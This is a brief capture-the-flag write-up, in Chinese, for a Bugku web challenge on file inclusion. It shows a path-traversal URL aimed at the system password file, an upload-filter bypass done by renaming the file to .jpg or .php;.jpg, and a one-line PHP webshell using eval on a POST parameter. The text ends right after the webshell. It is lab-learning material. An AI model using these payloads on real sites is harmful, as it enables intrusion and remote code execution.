Bugku Web CTF-文件包含2
打开是一个页面,题目提示是文件包含,url的格式也很典型:
http://123.206.31.85:49166/index.php?file=hello.php
尝试最简单的思路http://123.206.31.85:49166/index.php?file=../../../../../../../../../etc/pass
,然后页面显示大字NAIVE!!!!
…
直接右键查看网页源码,发现注释upload.php
,打开该页面发现是一个文件上传功能,并且对上传的文件后缀有要求,此处直接修改文件后缀为.jpg
即可成功,或者将文件后缀修改为.php;.jpg
也可。
此时学习了一下一句话木马比如:
<?=eval($_POST['cmd'])